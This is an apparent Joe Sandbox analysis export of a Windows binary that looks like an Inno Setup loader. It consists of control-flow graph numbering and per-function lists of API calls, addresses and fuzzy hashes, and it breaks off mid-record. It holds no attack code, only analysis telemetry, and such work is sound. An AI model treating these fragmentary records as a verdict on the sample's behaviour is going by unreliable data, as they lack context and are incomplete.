VirtualQuery 5521->5522 5523 409c2c 5522->5523 5526 409ba2 5522->5526 5528 409768 5523->5528 5524 409c0d VirtualQuery 5524->5523 5524->5526 5525 409bcc VirtualProtect 5525->5526 5526->5523 5526->5524 5526->5525 5527 409bfb VirtualProtect 5526->5527 5527->5524 5708 406bd0 GetCommandLineA 5528->5708 5530 409785 5531 409850 5530->5531 5532 406c2c 20 API calls 5530->5532 5535 403454 18 API calls 5530->5535 5533 4031b8 4 API calls 5531->5533 5532->5530 5534 40986a 5533->5534 5534->5468 5600 409c88 5534->5600 5535->5530 5537 406c53 GetModuleFileNameA 5536->5537 5538 406c77 GetCommandLineA 5536->5538 5539 403278 18 API calls 5537->5539 5546 406c7c 5538->5546 5540 406c75 5539->5540 5544 406ca4 5540->5544 5541 406c81 5542 403198 4 API calls 5541->5542 5545 406c89 5542->5545 5543 406af0 18 API calls 5543->5546 5547 403198 4 API calls 5544->5547 5548 40322c 4 API calls 5545->5548 5546->5541 5546->5543 5546->5545 5549 406cb9 5547->5549 5548->5544 5549->5469 5551 4074ea 5550->5551 5715 407576 5551->5715 5718 407578 5551->5718 5552 407516 5553 40752a 5552->5553 5554 40748c 35 API calls 5552->5554 5557 409c34 FindResourceA 5553->5557 5554->5553 5558 409c49 5557->5558 5559 409c4e SizeofResource 5557->5559 5560 409ae8 18 API calls 5558->5560 5561 409c60 LoadResource 5559->5561 5562 409c5b 5559->5562 5560->5559 5564 409c73 LockResource 5561->5564 5565 409c6e 5561->5565 5563 409ae8 18 API calls 5562->5563 5563->5561 5567 409c84 5564->5567 5568 409c7f 5564->5568 5566 409ae8 18 API calls 5565->5566 5566->5564 5567->5476 5567->5479 5569 409ae8 18 API calls 5568->5569 5569->5567 5571 4074b4 5570->5571 5572 4074c4 5571->5572 5573 4073ec 34 API calls 5571->5573 5572->5481 5573->5572 5575 407a35 5574->5575 5576 405890 18 API calls 5575->5576 5577 407a89 5575->5577 5576->5577 5578 407918 InterlockedExchange 5577->5578 5579 407a9b 5578->5579 5580 405890 18 API calls 5579->5580 5581 407ab1 5579->5581 5580->5581 5582 405890 18 API calls 5581->5582 5583 407af4 5581->5583 5582->5583 5583->5484 
5596 408b39 5584->5596 5598 408b82 5584->5598 5585 408bcd 5721 407cb8 5585->5721 5586 407cb8 35 API calls 5586->5596 5588 408be4 5591 4031b8 4 API calls 5588->5591 5589 4034f0 18 API calls 5589->5596 5590 4034f0 18 API calls 5590->5598 5593 408bfe 5591->5593 5592 4031e8 18 API calls 5592->5596 5614 404c20 5593->5614 5594 403420 18 API calls 5594->5596 5595 4031e8 18 API calls 5595->5598 5596->5586 5596->5589 5596->5592 5596->5594 5596->5598 5597 403420 18 API calls 5597->5598 5598->5585 5598->5590 5598->5595 5598->5597 5599 407cb8 35 API calls 5598->5599 5599->5598 5601 40322c 4 API calls 5600->5601 5602 409cab 5601->5602 5603 409cba MessageBoxA 5602->5603 5604 409ccf 5603->5604 5605 403198 4 API calls 5604->5605 5606 409cd7 5605->5606 5606->5468 5608 409af1 5607->5608 5609 409b09 5607->5609 5610 405890 18 API calls 5608->5610 5611 405890 18 API calls 5609->5611 5612 409b03 5610->5612 5613 409b1a 5611->5613 5612->5477 5613->5477 5743 402594 5614->5743 5616 404c2b 5616->5488 5617->5493 5619 405940 19 API calls 5618->5619 5620 405cb9 5619->5620 5621 405280 GetSystemDefaultLCID 5620->5621 5624 4052b6 5621->5624 5622 4031e8 18 API calls 5622->5624 5623 404cdc 19 API calls 5623->5624 5624->5622 5624->5623 5625 40520c 19 API calls 5624->5625 5626 405318 5624->5626 5625->5624 5627 404cdc 19 API calls 5626->5627 5628 40520c 19 API calls 5626->5628 5629 4031e8 18 API calls 5626->5629 5630 40539b 5626->5630 5627->5626 5628->5626 5629->5626 5631 4031b8 4 API calls 5630->5631 5632 4053b5 5631->5632 5633 4053c4 GetSystemDefaultLCID 5632->5633 5690 40520c GetLocaleInfoA 5633->5690 5636 4031e8 18 API calls 5637 405404 5636->5637 5638 40520c 19 API calls 5637->5638 5639 405419 5638->5639 5640 40520c 19 API calls 5639->5640 5641 40543d 5640->5641 5696 405258 GetLocaleInfoA 5641->5696 5644 405258 GetLocaleInfoA 5645 40546d 5644->5645 5646 40520c 19 API calls 5645->5646 5647 405487 5646->5647 5648 405258 GetLocaleInfoA 5647->5648 5649 4054a4 5648->5649 5650 40520c 19 API calls 
5649->5650 5651 4054be 5650->5651 5652 4031e8 18 API calls 5651->5652 5653 4054cb 5652->5653 5654 40520c 19 API calls 5653->5654 5655 4054e0 5654->5655 5656 4031e8 18 API calls 5655->5656 5657 4054ed 5656->5657 5658 405258 GetLocaleInfoA 5657->5658 5659 4054fb 5658->5659 5660 40520c 19 API calls 5659->5660 5661 405515 5660->5661 5662 4031e8 18 API calls 5661->5662 5663 405522 5662->5663 5664 40520c 19 API calls 5663->5664 5665 405537 5664->5665 5666 4031e8 18 API calls 5665->5666 5667 405544 5666->5667 5668 40520c 19 API calls 5667->5668 5669 405559 5668->5669 5670 405576 5669->5670 5671 405567 5669->5671 5673 40322c 4 API calls 5670->5673 5698 40322c 5671->5698 5674 405574 5673->5674 5675 40520c 19 API calls 5674->5675 5676 405598 5675->5676 5677 4055b5 5676->5677 5678 4055a6 5676->5678 5679 403198 4 API calls 5677->5679 5680 40322c 4 API calls 5678->5680 5681 4055b3 5679->5681 5680->5681 5682 4033b4 18 API calls 5681->5682 5683 4055d7 5682->5683 5684 4033b4 18 API calls 5683->5684 5685 4055f1 5684->5685 5686 4031b8 4 API calls 5685->5686 5687 40560b 5686->5687 5688 405cf4 GetVersionExA 5687->5688 5689 405d0b 5688->5689 5689->5458 5691 405233 5690->5691 5692 405245 5690->5692 5693 403278 18 API calls 5691->5693 5694 40322c 4 API calls 5692->5694 5695 405243 5693->5695 5694->5695 5695->5636 5697 405274 5696->5697 5697->5644 5700 403230 5698->5700 5699 403252 5699->5674 5700->5699 5701 4025ac 4 API calls 5700->5701 5701->5699 5706 403414 5702->5706 5705 406fee 5705->5518 5707 403418 LoadLibraryA 5706->5707 5707->5705 5709 406af0 18 API calls 5708->5709 5710 406bf3 5709->5710 5711 406c05 5710->5711 5712 406af0 18 API calls 5710->5712 5713 403198 4 API calls 5711->5713 5712->5710 5714 406c1a 5713->5714 5714->5530 5716 407578 5715->5716 5717 4075b7 CreateFileA 5716->5717 5717->5552 5719 403414 5718->5719 5720 4075b7 CreateFileA 5719->5720 5720->5552 5722 407cd3 5721->5722 5724 407cc8 5721->5724 5727 407c5c 5722->5727 5724->5588 5726 405890 18 API calls 5726->5724 5728 
407c70 5727->5728 5729 407caf 5727->5729 5728->5729 5731 407bac 5728->5731 5729->5724 5729->5726 5732 407bb7 5731->5732 5736 407bc8 5731->5736 5734 405890 18 API calls 5732->5734 5733 4074a0 34 API calls 5735 407bdc 5733->5735 5734->5736 5737 4074a0 34 API calls 5735->5737 5736->5733 5738 407bfd 5737->5738 5739 407918 InterlockedExchange 5738->5739 5740 407c12 5739->5740 5741 407c28 5740->5741 5742 405890 18 API calls 5740->5742 5741->5728 5742->5741 5744 402598 5743->5744 5745 4025a2 5743->5745 5749 401fd4 5744->5749 5745->5616 5745->5745 5746 40259e 5746->5745 5747 403154 4 API calls 5746->5747 5747->5745 5750 401fe8 5749->5750 5751 401fed 5749->5751 5760 401918 RtlInitializeCriticalSection 5750->5760 5753 402012 RtlEnterCriticalSection 5751->5753 5754 40201c 5751->5754 5759 401ff1 5751->5759 5753->5754 5754->5759 5767 401ee0 5754->5767 5757 402147 5757->5746 5758 40213d RtlLeaveCriticalSection 5758->5757 5759->5746 5761 40193c RtlEnterCriticalSection 5760->5761 5762 401946 5760->5762 5761->5762 5763 401964 LocalAlloc 5762->5763 5764 40197e 5763->5764 5765 4019c3 RtlLeaveCriticalSection 5764->5765 5766 4019cd 5764->5766 5765->5766 5766->5751 5770 401ef0 5767->5770 5768 401f1c 5772 401f40 5768->5772 5778 401d00 5768->5778 5770->5768 5770->5772 5773 401e58 5770->5773 5772->5757 5772->5758 5782 4016d8 5773->5782 5776 401e75 5776->5770 5779 401d4e 5778->5779 5780 401d1e 5778->5780 5779->5780 5851 401c68 5779->5851 5780->5772 5785 4016f4 5782->5785 5784 4016fe 5807 4015c4 5784->5807 5785->5784 5787 40175b 5785->5787 5789 40174f 5785->5789 5799 401430 5785->5799 5811 40132c 5785->5811 5787->5776 5792 401dcc 5787->5792 5815 40150c 5789->5815 5790 40170a 5790->5787 5825 401d80 5792->5825 5795 40132c LocalAlloc 5796 401df0 5795->5796 5798 401df8 5796->5798 5829 401b44 5796->5829 5798->5776 5800 40143f VirtualAlloc 5799->5800 5802 40146c 5800->5802 5803 40148f 5800->5803 5819 4012e4 5802->5819 5803->5785 5806 40147c VirtualFree 5806->5803 5809 40160a 5807->5809 5808 40163a 
5808->5790 5809->5808 5810 401626 VirtualAlloc 5809->5810 5810->5808 5810->5809 5812 401348 5811->5812 5813 4012e4 LocalAlloc 5812->5813 5814 40138f 5813->5814 5814->5785 5818 40153b 5815->5818 5816 401594 5816->5787 5817 401568 VirtualFree 5817->5818 5818->5816 5818->5817 5822 40128c 5819->5822 5823 401298 LocalAlloc 5822->5823 5824 4012aa 5822->5824 5823->5824 5824->5803 5824->5806 5826 401d89 5825->5826 5828 401d92 5825->5828 5826->5828 5834 401b74 5826->5834 5828->5795 5830 401b61 5829->5830 5831 401b52 5829->5831 5830->5798 5832 401d00 9 API calls 5831->5832 5833 401b5f 5832->5833 5833->5798 5837 40215c 5834->5837 5836 401b95 5836->5828 5838 40217a 5837->5838 5839 402175 5837->5839 5841 4021ab RtlEnterCriticalSection 5838->5841 5842 40217e 5838->5842 5849 4021b5 5838->5849 5840 401918 4 API calls 5839->5840 5840->5838 5841->5849 5842->5836 5843 4021c1 5845 4022e3 RtlLeaveCriticalSection 5843->5845 5846 4022ed 5843->5846 5844 402244 5844->5842 5847 401d80 7 API calls 5844->5847 5845->5846 5846->5836 5847->5842 5848 402270 5848->5843 5850 401d00 7 API calls 5848->5850 5849->5843 5849->5844 5849->5848 5850->5843 5852 401c7a 5851->5852 5853 401c9d 5852->5853 5854 401caf 5852->5854 5864 40188c 5853->5864 5856 40188c 3 API calls 5854->5856 5857 401cad 5856->5857 5858 401b44 9 API calls 5857->5858 5863 401cc5 5857->5863 5859 401cd4 5858->5859 5860 401cee 5859->5860 5874 401b98 5859->5874 5879 4013a0 5860->5879 5863->5780 5865 4018b2 5864->5865 5873 40190b 5864->5873 5883 401658 5865->5883 5868 40132c LocalAlloc 5869 4018cf 5868->5869 5870 40150c VirtualFree 5869->5870 5871 4018e6 5869->5871 5870->5871 5872 4013a0 LocalAlloc 5871->5872 5871->5873 5872->5873 5873->5857 5875 401bab 5874->5875 5876 401b9d 5874->5876 5875->5860 5877 401b74 9 API calls 5876->5877 5878 401baa 5877->5878 5878->5860 5881 4013ab 5879->5881 5880 4013c6 5880->5863 5881->5880 5882 4012e4 LocalAlloc 5881->5882 5882->5880 5885 40168f 5883->5885 5884 4016cf 5884->5868 5885->5884 5886 4016a9 
VirtualFree 5885->5886 5886->5885 6843 402dfa 6844 402e0d 6843->6844 6846 402e26 6843->6846 6847 402ba4 6844->6847 6848 402bc9 6847->6848 6849 402bad 6847->6849 6848->6846 6850 402bb5 RaiseException 6849->6850 6850->6848 6851 4075fa GetFileSize 6852 407626 6851->6852 6853 407616 GetLastError 6851->6853 6853->6852 6854 40761f 6853->6854 6855 40748c 35 API calls 6854->6855 6855->6852 6856 406ffb 6857 407008 SetErrorMode 6856->6857 6525 403a80 CloseHandle 6526 403a90 6525->6526 6527 403a91 GetLastError 6525->6527 6528 404283 6529 4042c3 6528->6529 6530 403154 4 API calls 6529->6530 6531 404323 6530->6531 6858 404185 6859 4041ff 6858->6859 6860 4041cc 6859->6860 6861 403154 4 API calls 6859->6861 6862 404323 6861->6862 6532 403e87 6533 403e4c 6532->6533 6534 403e62 6533->6534 6535 403e7b 6533->6535 6538 403e67 6533->6538 6541 403cc8 6534->6541 6537 402674 4 API calls 6535->6537 6539 403e78 6537->6539 6538->6539 6545 402674 6538->6545 6542 403cd6 6541->6542 6543 402674 4 API calls 6542->6543 6544 403ceb 6542->6544 6543->6544 6544->6538 6546 403154 4 API calls 6545->6546 6547 40267a 6546->6547 6547->6539 6556 407e90 6557 407eb8 VirtualFree 6556->6557 6558 407e9d 6557->6558 6561 403e95 6562 403e4c 6561->6562 6563 403e67 6562->6563 6564 403e62 6562->6564 6565 403e7b 6562->6565 6568 403e78 6563->6568 6569 402674 4 API calls 6563->6569 6566 403cc8 4 API calls 6564->6566 6567 402674 4 API calls 6565->6567 6566->6563 6567->6568 6569->6568 6570 40ac97 6579 4096fc 6570->6579 6573 402f24 5 API calls 6574 40aca1 6573->6574 6575 403198 4 API calls 6574->6575 6576 40acc0 6575->6576 6577 403198 4 API calls 6576->6577 6578 40acc8 6577->6578 6588 4056ac 6579->6588 6581 409717 6582 409745 6581->6582 6594 40720c 6581->6594 6585 403198 4 API calls 6582->6585 6584 409735 6587 40973d MessageBoxA 6584->6587 6586 40975a 6585->6586 6586->6573 6586->6574 6587->6582 6589 403154 4 API calls 6588->6589 6590 4056b1 6589->6590 6591 4056c9 6590->6591 6592 403154 4 API calls 6590->6592 6591->6581 6593 
4056bf 6592->6593 6593->6581 6595 4056ac 4 API calls 6594->6595 6596 40721b 6595->6596 6597 407221 6596->6597 6598 40722f 6596->6598 6599 40322c 4 API calls 6597->6599 6601 40724b 6598->6601 6602 40723f 6598->6602 6600 40722d 6599->6600 6600->6584 6612 4032b8 6601->6612 6605 4071d0 6602->6605 6606 40322c 4 API calls 6605->6606 6607 4071df 6606->6607 6608 4071fc 6607->6608 6609 406950 CharPrevA 6607->6609 6608->6600 6610 4071eb 6609->6610 6610->6608 6611 4032fc 18 API calls 6610->6611 6611->6608 6613 403278 18 API calls 6612->6613 6614 4032c2 6613->6614 6614->6600 6615 403a97 6616 403aac 6615->6616 6617 403bbc GetStdHandle 6616->6617 6618 403b0e CreateFileA 6616->6618 6626 403ab2 6616->6626 6619 403c17 GetLastError 6617->6619 6632 403bba 6617->6632 6618->6619 6620 403b2c 6618->6620 6619->6626 6622 403b3b GetFileSize 6620->6622 6620->6632 6622->6619 6623 403b4e SetFilePointer 6622->6623 6623->6619 6628 403b6a ReadFile 6623->6628 6624 403be7 GetFileType 6625 403c02 CloseHandle 6624->6625 6624->6626 6625->6626 6628->6619 6629 403b8c 6628->6629 6630 403b9f SetFilePointer 6629->6630 6629->6632 6630->6619 6631 403bb0 SetEndOfFile 6630->6631 6631->6619 6631->6632 6632->6624 6632->6626 6637 40aaa2 6638 40aad2 6637->6638 6639 40aadc CreateWindowExA SetWindowLongA 6638->6639 6640 405194 33 API calls 6639->6640 6641 40ab5f 6640->6641 6642 4032fc 18 API calls 6641->6642 6643 40ab6d 6642->6643 6644 4032fc 18 API calls 6643->6644 6645 40ab7a 6644->6645 6646 406b7c 19 API calls 6645->6646 6647 40ab86 6646->6647 6648 4032fc 18 API calls 6647->6648 6649 40ab8f 6648->6649 6650 4099ec 43 API calls 6649->6650 6651 40aba1 6650->6651 6652 4098cc 19 API calls 6651->6652 6653 40abb4 6651->6653 6652->6653 6654 40abed 6653->6654 6655 4094d8 9 API calls 6653->6655 6656 40ac06 6654->6656 6659 40ac00 RemoveDirectoryA 6654->6659 6655->6654 6657 40ac1a 6656->6657 6658 40ac0f DestroyWindow 6656->6658 6660 40ac42 6657->6660 6661 40357c 4 API calls 6657->6661 6658->6657 6659->6656 6662 40ac38 
6661->6662 6663 4025ac 4 API calls 6662->6663 6663->6660 6875 405ba2 6877 405ba4 6875->6877 6876 405be0 6880 405940 19 API calls 6876->6880 6877->6876 6878 405bf7 6877->6878 6879 405bda 6877->6879 6884 404cdc 19 API calls 6878->6884 6879->6876 6881 405c4c 6879->6881 6882 405bf3 6880->6882 6883 4059b0 33 API calls 6881->6883 6885 403198 4 API calls 6882->6885 6883->6882 6886 405c20 6884->6886 6887 405c86 6885->6887 6888 4059b0 33 API calls 6886->6888 6888->6882 6889 408da4 6890 408dc8 6889->6890 6891 408c80 18 API calls 6890->6891 6892 408dd1 6891->6892 6664 402caa 6665 403154 4 API calls 6664->6665 6666 402caf 6665->6666 6907 4011aa 6908 4011ac GetStdHandle 6907->6908 6667 4028ac 6668 402594 18 API calls 6667->6668 6669 4028b6 6668->6669 4979 40aab4 4980 40aab8 SetLastError 4979->4980 5011 409648 GetLastError 4980->5011 4983 40aad2 4985 40aadc CreateWindowExA SetWindowLongA 4983->4985 5024 405194 4985->5024 4989 40ab6d 4990 4032fc 18 API calls 4989->4990 4991 40ab7a 4990->4991 5041 406b7c GetCommandLineA 4991->5041 4994 4032fc 18 API calls 4995 40ab8f 4994->4995 5046 4099ec 4995->5046 4997 40aba1 4999 40abb4 4997->4999 5067 4098cc 4997->5067 5000 40abd4 4999->5000 5001 40abed 4999->5001 5073 4094d8 5000->5073 5003 40ac06 5001->5003 5006 40ac00 RemoveDirectoryA 5001->5006 5004 40ac1a 5003->5004 5005 40ac0f DestroyWindow 5003->5005 5007 40ac42 5004->5007 5081 40357c 5004->5081 5005->5004 5006->5003 5009 40ac38 5094 4025ac 5009->5094 5098 404c94 5011->5098 5019 4096c3 5113 4031b8 5019->5113 5025 4051a8 33 API calls 5024->5025 5026 4051a3 5025->5026 5027 4032fc 5026->5027 5028 403300 5027->5028 5029 40333f 5027->5029 5030 4031e8 5028->5030 5031 40330a 5028->5031 5029->4989 5037 403254 18 API calls 5030->5037 5038 4031fc 5030->5038 5032 403334 5031->5032 5033 40331d 5031->5033 5034 4034f0 18 API calls 5032->5034 5274 4034f0 5033->5274 5040 403322 5034->5040 5035 403228 5035->4989 5037->5038 5038->5035 5039 4025ac 4 API calls 5038->5039 5039->5035 5040->4989 5300 406af0 
5041->5300 5043 406ba1 5044 403198 4 API calls 5043->5044 5045 406bbf 5044->5045 5045->4994 5314 4033b4 5046->5314 5048 409a27 5049 409a59 CreateProcessA 5048->5049 5050 409a65 5049->5050 5051 409a6c CloseHandle 5049->5051 5052 409648 35 API calls 5050->5052 5053 409a75 5051->5053 5052->5051 5054 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5053->5054 5055 409a7a MsgWaitForMultipleObjects 5054->5055 5055->5053 5056 409a91 5055->5056 5057 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5056->5057 5058 409a96 GetExitCodeProcess CloseHandle 5057->5058 5059 409ab6 5058->5059 5060 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5059->5060 5061 409abe 5060->5061 5061->4997 5062 402f24 5063 403154 4 API calls 5062->5063 5064 402f29 5063->5064 5320 402bcc 5064->5320 5066 402f51 5066->5066 5068 40990e 5067->5068 5069 4098d4 5067->5069 5068->4999 5069->5068 5070 403420 18 API calls 5069->5070 5071 409908 5070->5071 5323 408e80 5071->5323 5074 409532 5073->5074 5078 4094eb 5073->5078 5074->5001 5075 4094f3 Sleep 5075->5078 5076 409503 Sleep 5076->5078 5078->5074 5078->5075 5078->5076 5079 40951a GetLastError 5078->5079 5346 408fbc 5078->5346 5079->5074 5080 409524 GetLastError 5079->5080 5080->5074 5080->5078 5084 403591 5081->5084 5090 4035a0 5081->5090 5082 4035b1 5085 403198 4 API calls 5082->5085 5083 4035b8 5086 4031b8 4 API calls 5083->5086 5087 4035d0 5084->5087 5088 40359b 5084->5088 5089 4035b6 5084->5089 5085->5089 5086->5089 5087->5089 5092 40357c 4 API calls 5087->5092 5088->5090 5091 4035ec 5088->5091 5089->5009 5090->5082 5090->5083 5091->5089 5363 403554 5091->5363 5092->5087 5095 4025b0 5094->5095 5096 4025ba 5094->5096 5095->5096 5097 403154 4 API calls 5095->5097 5096->5007 5096->5096 5097->5096 5121 4051a8 5098->5121 5101 407284 FormatMessageA 5102 4072aa 5101->5102 5103 403278 18 API calls 5102->5103 5104 4072c7 5103->5104 5105 408da8 5104->5105 5106 408dc8 5105->5106 5264 408c80 5106->5264 5109 405890 5110 405897 5109->5110 5111 

Control-flow Graph
APIs
• GetSystemInfo.KERNEL32(?), ref: 00409B8A
• VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
• VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
• VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
• VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: Virtual$ProtectQuery$InfoSystem
• String ID:
• API String ID: 2441996862-0
• Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
• Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
• Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
• Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669

APIs
• GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
• Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
• Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
• Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
• GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
• GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
• SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: AddressProc$HandleModulePolicyProcess
• String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
• API String ID: 3256987805-3653653586
• Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
• Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
• Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
• Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

Control-flow Graph

APIs
• SetLastError.KERNEL32 ref: 0040AAC1
  • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020724E0), ref: 0040966C
• CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
• SetWindowLongA.USER32(00010438,000000FC,00409960), ref: 0040AB15
• RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
• DestroyWindow.USER32(00010438,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
Strings
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
• String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
• API String ID: 3757039580-3001827809
• Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
• Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
• Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
• Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2500192194.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2500112810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500260768.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2500351036.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_list.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
• API String ID: 1646373207-2130885113
• Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
• Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
• Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
• Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E

Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                                                        • SetWindowLongA.USER32(00010438,000000FC,00409960), ref: 0040AB15
                                                                                                                                          • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                                                                          • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724E0,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                                                          • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724E0,00409AD8,00000000), ref: 00409A70
                                                                                                                                          • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                                                          • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                                                          • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020724E0,00409AD8), ref: 00409AA4
                                                                                                                                        • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                                                        • DestroyWindow.USER32(00010438,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
